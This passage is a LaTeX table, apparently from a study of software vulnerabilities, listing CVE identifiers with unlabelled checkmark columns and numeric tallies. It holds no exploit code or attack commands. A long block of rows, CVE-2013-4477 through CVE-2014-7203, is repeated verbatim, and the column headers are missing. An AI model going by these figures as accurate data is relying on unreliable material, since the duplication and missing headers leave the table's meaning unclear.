/checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule -CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule -CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-6348 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule -CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule -CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule -CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule -CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule -CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2014-0193 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule -CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule -CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule -CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule -CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule -CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule -CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-2525 & & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 56 & & \\ \midrule -CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule -CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule -CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule -CVE-2014-3576 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 52 & & \\ \midrule -CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule -CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule -CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule -CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule -CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule -CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule -CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-7143 & & & & & & & /checkmark & & /checkmark & & & & & & & & 2 & 44 & 46 & 46 \\ \midrule -CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule -CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule -CVE-2014-7205 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-8115 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 80 & & \\ \midrule -CVE-2014-8176 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule -CVE-2014-8650 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2014-8681 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-8682 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-8991 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-9130 & /checkmark & & & & & /checkmark & & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-9682 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-9720 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2014-9721 & /checkmark & & & & & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & 2 & 142 & 154 & 154 \\ \midrule -CVE-2014-10068 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-10077 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-0206 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & 1 & 194 & & \\ \midrule -CVE-2015-0209 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 182 & & \\ \midrule -CVE-2015-0288 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 188 & & \\ \midrule -CVE-2015-0838 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2015-0846 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-1326 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 178 & & \\ \midrule -CVE-2015-1782 & & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-1788 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 186 & & \\ \midrule -CVE-2015-1791 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & /checkmark & 1 & 192 & & \\ \midrule -CVE-2015-1792 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 194 & & \\ \midrule -CVE-2015-2068 & & & & & & /checkmark & /checkmark & & /checkmark & & /checkmark & & & & & & 7 & 56 & 60 & 56 \\ \midrule -CVE-2015-2156 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 82 & & \\ \midrule -CVE-2015-2296 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-2912 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & & 1 & 162 & & \\ \midrule -CVE-2015-2913 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2015-3010 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 142 & & \\ \midrule -CVE-2015-3195 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 196 & & \\ \midrule -CVE-2015-3196 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-3220 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule -CVE-2015-3253 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-4053 & & & & & & & & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 110 & & \\ \midrule -CVE-2015-4082 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-4412 & /checkmark & & & & & /checkmark & /checkmark & & & & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-4619 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-4706 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 80 & & \\ \midrule -CVE-2015-5081 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2015-5147 & /checkmark & & & & & & & & & & & & & & & & 1 & 64 & & \\ \midrule -CVE-2015-5159 & /checkmark & & & & & & & & & & & & & & & & 1 & 160 & & \\ \midrule -CVE-2015-5211 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule -CVE-2015-5253 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2015-5254 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 148 & & \\ \midrule -CVE-2015-5607 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 116 & & \\ \midrule -CVE-2015-6748 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2015-7294 & /checkmark & & & & & /checkmark & & /checkmark & & & /checkmark & & & /checkmark & & & 1 & 150 & & \\ \midrule -CVE-2015-7314 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-7316 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 98 & & \\ \midrule -CVE-2015-7559 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 156 & & \\ \midrule -CVE-2015-7809 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2015-8213 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2015-8309 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 168 & & \\ \midrule -CVE-2015-8310 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule -CVE-2015-8747 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-8748 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2015-8814 & /checkmark & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2015-8968 & /checkmark & & & & & & & & & & & & & /checkmark & & & 1 & 130 & & \\ \midrule -CVE-2015-9235 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2015-9243 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule -CVE-2015-9251 & /checkmark & & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & /checkmark & & /checkmark & 1 & 156 & & \\ \midrule -CVE-2016-0750 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 72 & & \\ \midrule -CVE-2010-0684 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 66 & & \\ \midrule -CVE-2010-2245 & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & & & 3 & 22 & 104 & 50 \\ \midrule -CVE-2010-5312 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2011-1772 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule -CVE-2011-1950 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 58 & & \\ \midrule -CVE-2011-2732 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & /checkmark & 1 & 54 & & \\ \midrule -CVE-2011-3871 & & & & & & & & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 104 & & \\ \midrule -CVE-2011-4104 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2011-4461 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & & & & 1 & 104 & & \\ \midrule -CVE-2011-4838 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 174 & & \\ \midrule -CVE-2011-5036 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2012-1109 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2012-1176 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & /checkmark & & & 1 & 150 & & \\ \midrule -CVE-2012-2139 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-2417 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 122 & & \\ \midrule -CVE-2012-3366 & /checkmark & & & & & & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3408 & /checkmark & & & & & /checkmark & & & /checkmark & & & & & & & & 1 & 108 & & \\ \midrule -CVE-2012-3458 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2012-3865 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2012-4386 & & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 74 & & \\ \midrule -CVE-2012-4387 & & & & & & & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 82 & & \\ \midrule -CVE-2012-4520 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2012-5812 & & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 52 & & \\ \midrule -CVE-2012-6550 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 132 & & \\ \midrule -CVE-2012-6662 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2012-6684 & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2012-6685 & /checkmark & & & & & & & & & & & /checkmark & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2013-0256 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2013-0262 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 178 & & \\ \midrule -CVE-2013-0263 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 170 & & \\ \midrule -CVE-2013-0294 & /checkmark & & & & & /checkmark & & & & & & & & & & & 1 & 104 & & \\ \midrule -CVE-2013-1607 & & & & & & & & & & & & & & & & & 3 & 32 & 34 & 32 \\ \midrule -CVE-2013-1801 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2013-1812 & /checkmark & & & & & & & /checkmark & & /checkmark & & /checkmark & & /checkmark & & & 1 & 146 & & \\ \midrule -CVE-2013-1879 & & & & & & /checkmark & & & & /checkmark & /checkmark & & & & & & 1 & 82 & & \\ \midrule -CVE-2013-1880 & & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 86 & & \\ \midrule -CVE-2013-2013 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2013-2035 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 84 & & \\ \midrule -CVE-2013-2132 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-2191 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2013-3300 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-4002 & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 2 & 34 & 46 & 46 \\ \midrule -CVE-2013-4111 & & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 56 & & \\ \midrule -CVE-2013-4116 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ \midrule -CVE-2013-4249 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-4353 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 188 & & \\ \midrule -CVE-2013-4413 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & /checkmark & & & /checkmark & & & 1 & 118 & & \\ \midrule -CVE-2013-4477 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 132 & & \\ \midrule -CVE-2013-4562 & /checkmark & & & & & & & /checkmark & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2013-4701 & /checkmark & & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2013-5093 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-5123 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 102 & & \\ \midrule -CVE-2013-6044 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 126 & & \\ \midrule -CVE-2013-6348 & & & & & & /checkmark & & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & 1 & 94 & & \\ \midrule -CVE-2013-6429 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6430 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2013-6465 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 122 & & \\ \midrule -CVE-2013-7370 & /checkmark & & & & & & & & & & & & & & & & 1 & 96 & & \\ \midrule -CVE-2013-7397 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & /checkmark & & /checkmark & 1 & 144 & & \\ \midrule -CVE-2013-7398 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & & 1 & 154 & & \\ \midrule -CVE-2013-7459 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-0012 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & & 2 & 108 & 138 & 138 \\ \midrule -CVE-2014-0072 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0073 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-0110 & /checkmark & & & & & & & & & /checkmark & & & & & & /checkmark & 1 & 102 & & \\ \midrule -CVE-2014-0120 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-0121 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 1 & 124 & & \\ \midrule -CVE-2014-0177 & /checkmark & & & & & /checkmark & & & & /checkmark & & & & & & & 1 & 172 & & \\ \midrule -CVE-2014-0193 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & /checkmark & 1 & 130 & & \\ \midrule -CVE-2014-0225 & /checkmark & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 118 & & \\ \midrule -CVE-2014-1202 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 96 & & \\ \midrule -CVE-2014-1402 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & /checkmark & & & & & & 2 & 124 & 150 & 150 \\ \midrule -CVE-2014-1403 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 180 & & \\ \midrule -CVE-2014-1604 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1830 & /checkmark & & & & & & /checkmark & & & /checkmark & & & & & & & 1 & 108 & & \\ \midrule -CVE-2014-1832 & /checkmark & & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-1858 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-1859 & /checkmark & & & & & & & & & & /checkmark & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-1869 & /checkmark & & & & & & /checkmark & & & & /checkmark & & & & & /checkmark & 1 & 110 & & \\ \midrule -CVE-2014-1904 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-1932 & /checkmark & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 124 & & \\ \midrule -CVE-2014-1933 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & /checkmark & & /checkmark & 1 & 116 & & \\ \midrule -CVE-2014-2053 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & 1 & 192 & & \\ \midrule -CVE-2014-2235 & /checkmark & & & & & /checkmark & & & /checkmark & & /checkmark & & & & & & 1 & 112 & & \\ \midrule -CVE-2014-2525 & & & & & & & /checkmark & /checkmark & & /checkmark & /checkmark & & & & & & 1 & 56 & & \\ \midrule -CVE-2014-3007 & /checkmark & & & & & /checkmark & & /checkmark & /checkmark & & & & & /checkmark & & /checkmark & 1 & 120 & & \\ \midrule -CVE-2014-3488 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & & & 1 & 128 & & \\ \midrule -CVE-2014-3506 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & & /checkmark & & & & & & /checkmark & 1 & 190 & & \\ \midrule -CVE-2014-3511 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & & & & & & /checkmark & 1 & 182 & & \\ \midrule -CVE-2014-3576 & & & & & & /checkmark & /checkmark & & /checkmark & & & & & & & & 1 & 52 & & \\ \midrule -CVE-2014-3578 & /checkmark & & & & & & & & & & & & & & & /checkmark & 1 & 66 & & \\ \midrule -CVE-2014-3579 & /checkmark & & & & & /checkmark & & & /checkmark & /checkmark & & & & & & & 1 & 146 & & \\ \midrule -CVE-2014-3599 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 70 & & \\ \midrule -CVE-2014-3600 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & & 1 & 138 & & \\ \midrule -CVE-2014-3625 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule -CVE-2014-3741 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-3995 & /checkmark & & & & & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & /checkmark & & & & & /checkmark & 1 & 134 & & \\ \midrule -CVE-2014-4658 & /checkmark & & & & & & & & /checkmark & /checkmark & & & & & & /checkmark & 1 & 106 & & \\ \midrule -CVE-2014-6394 & /checkmark & & & & & & & & & /checkmark & & & & /checkmark & & & 1 & 134 & & \\ \midrule -CVE-2014-7143 & & & & & & & /checkmark & & /checkmark & & & & & & & & 2 & 44 & 46 & 46 \\ \midrule -CVE-2014-7192 & /checkmark & & & & & /checkmark & /checkmark & & & /checkmark & /checkmark & & & & & & 1 & 120 & & \\ \midrule -CVE-2014-7193 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 1 & 106 & & \\ \midrule -CVE-2014-7202 & /checkmark & & & & & & & & & /checkmark & /checkmark & & & /checkmark & & & 3 & 138 & 150 & 142 \\ \midrule -CVE-2014-7203 & /checkmark & & & & & & & & & /checkmark & & /checkmark & & /checkmark & & & 1 & 138 & & \\ 